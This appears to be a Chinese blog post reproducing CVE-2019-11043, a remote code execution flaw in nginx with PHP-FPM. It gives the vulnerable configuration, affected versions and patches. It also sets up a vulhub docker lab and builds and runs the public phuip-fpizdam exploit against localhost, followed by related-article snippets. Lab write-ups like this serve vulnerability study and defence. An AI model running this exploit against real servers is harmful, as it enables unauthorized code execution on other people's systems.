CVE-2019-11043漏洞复现

最新推荐文章于 2025-06-29 03:24:54 发布
原创 最新推荐文章于 2025-06-29 03:24:54 发布 · 426 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#nginx #php #linux #docker

本文围绕CVE-2019-11043漏洞展开,介绍了该漏洞因nginx + php - fpm配置不当导致远程代码执行,影响PHP 7.0 - 7.3版本,给出修复建议。还讲述了在kali系统搭建docker、golang环境进行漏洞复现,以及利用工具攻击的过程,并提供参考链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2019-11043漏洞复现

0x01漏洞简介

nginx + php-fpm 配置不当,当nginx配置文件中有fastcgi_split_path_info,却没有if(!-f $document_root$fastcgi_script_name){return 404;}的时候就会导致远程代码执行。

向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。

该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下:

location ~ [^/]\.php(/|$) {
...
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass   php:9000;
...
}

攻击者可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp。 Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。

影响版本:

  • PHP 7.0 版本
  • PHP 7.1 版本
  • PHP 7.2 版本
  • PHP 7.3 版本

修复建议:

  • PHP 7.1.X更新至7.1.33
  • PHP 7.2.X更新至7.2.24
  • PHP 7.3.X更新至7.3.11

0x02环境搭建

系统:kali

安装 docker、golang 环境

sudo apt-get install docker docker-compose
sudo apt install golang

搭建环境

git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2019-11043 && docker-compose up -d

在这里插入图片描述

查看docker环境:

在这里插入图片描述

访问8080端口,成功如下

在这里插入图片描述

0x03漏洞利用

安装漏洞利用工具

git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go env -w GOPROXY=https://goproxy.cn
go get -v && go build

默认使用的是proxy.golang.org,在国内无法访问,所以换了一个国内能访问的代理地址:https://goproxy.cn

在这里插入图片描述

工具攻击

./phuip-fpizdam http://127.0.0.1:8080/index.php

在这里插入图片描述

成功利用,参数名为a

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AAP46kuo-1610457931550)(C:\Users\10068\AppData\Roaming\Typora\typora-user-images\image-20201225021301464.png)]

0x04参考链接:

https://blog.csdn.net/weixin_43606134/article/details/107646467

https://blog.csdn.net/qq_43342566/article/details/102733144

http://blog.leanote.com/post/snowming/9da184ef24bd

https://blog.csdn.net/weixin_40412037/article/details/111225967

CVE-2019-11043复现
hhiollk的博客
03-31 640
01 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 漏洞环境: 先把exp克隆到本地。 gitclonehttps://github.com/neex/phuip-fpizdam.git 安装go环境 wget -c h...
漏洞复现CVE-2019-11043PHP远程代码执行漏洞)信息安全论文_含漏洞复现完整过程_含Linux环境go语言编译环境安装
m0_74823434的博客
01-21 724
PHP5.4版本之前,Nginx处理PHP的流程是调用php-fpm,php-fpm再创建进程,调用php-cgi,以此实现了Ngixn对PHP的解析问题,此时php-fpm起到的是管理php-cgi的作用。fast-cgi协议改进了进程的处理模式,当一次通信完成后,通信进程会得以保留,不会杀死通信使用的进程,其他的通信还可以继续使用这个进程,这样一来,就大大提升了系统资源使用效率。最后,信息安全是一个持续的过程,需要不断地学习和更新知识,跟踪最新的漏洞和攻击技术,并采取相应的防护措施。
CVE-2019-11043PHP远程代码执行漏洞复现
永远是少年
12-11 3178
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-11043PHP远程代码执行漏洞复现。 一、CVE-2019-11043PHP远程代码执行漏洞)简介 二、CVE-2019-11043PHP远程代码执行漏洞漏洞环境搭建 三、CVE-2019-11043PHP远程代码执行漏洞漏洞利用工具安装 四、CVE-2019-11043PHP远程代码执行漏洞复现
[复现] CVE-2025-33053
安全小白,希望我的文章对你有所帮助。
06-29 1350
本地复现CVE-2025-33053
CVE-2019-11043PHP远程代码执行漏洞
m0_51468027的博客
02-12 9594
一、漏洞描述   CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。   向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。   该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_
CVE-2019-11043 漏洞复现
Jay17的博客
07-13 992
CVE-2019-11043 漏洞复现
CMS Made Simple (CMSMS) 前台SQL注入漏洞 CVE-2019-9053.md
04-08
7. 漏洞复现漏洞复现是指在受控环境中重现已知漏洞的过程。这一过程需要使用特定的漏洞POC(Proof of Concept,概念验证)脚本来验证漏洞的真实性和可利用性。本案例中的POC脚本可以从提供漏洞信息的网站上获得,...
PHP 远程代码执行漏洞复现CVE-2019-11043
Palpitate_LL的博客
03-13 396
CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发。攻击者可以使用换行符(%0a)来破坏 fastcgi_split_path_info 指令中的Regexp。Regexp被损坏导致PATH_INFO为空,从而触发该漏洞
PHP远程代码执行漏洞(CVE-2019-11043)复现
m_ing
07-28 2049
漏洞说明# 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发 漏洞编号# CVE-2019-11043 影响范围# 在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远
PHP-FPM 远程代码执行漏洞CVE-2019-11043复现
LRainner的博客
03-03 4423
PHP-FPM 远程代码执行漏洞CVE-2019-11043复现 环境搭建 git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043 docker-compose up -d 访问 安装漏洞利用工具 git clone https://github.com/neex/phuip-fpizdam.git cd phuip-fpizdam go env -w GOPROXY=https://goproxy.c
CVE-2019-11043 PHP-FPM 复现和学习(环境CTFShow web311)
paidx0
08-09 566
CVE-2019-11043复现和学习 漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发。 location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcg
cve-2019-11043复现(靶机为Ubuntu18.04,php编译安装)
ckm1607011的博客
02-29 944
最近做的项目需要复现nginx的exp,其中就包括cve-2019-11043这个exp,他是一个远程代码执行的exp; 这个cve的来源:GitHub - neex/phuip-fpizdam: Exploit for CVE-2019-11043 我看了之后在Kali上把源码编译了,大家注意编译需要1.13以上版本的go,编译出来的可执行文件在linux平台上就都可以执行了; 让我感到...
cve漏洞复现php,CVE-2019-11043 远程代码执行漏洞复现
weixin_30405507的博客
03-19 217
影响范围在使用 Nginx+php+fpm 的服务器上,使用如下配置,都有可能存在远程代码执行漏洞location ~ [^/]\.php(/|$) {...fastcgi_split_path_info ^(.+?\.php)(/.*)$;fastcgi_param PATH_INFO $fastcgi_path_info;fastcgi_pass php:9000;}漏洞复现这...
weblogic(CVE-2019-2725)漏洞复现
最新发布
07-25
</think>### WebLogic CVE-2019-2725 漏洞复现步骤及利用方法 CVE-2019-2725 是 Oracle WebLogic Server 中的一个高危反序列化远程代码执行(RCE)漏洞。该漏洞存在于 `wls9-async` 组件中,攻击者可以通过向 `/_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值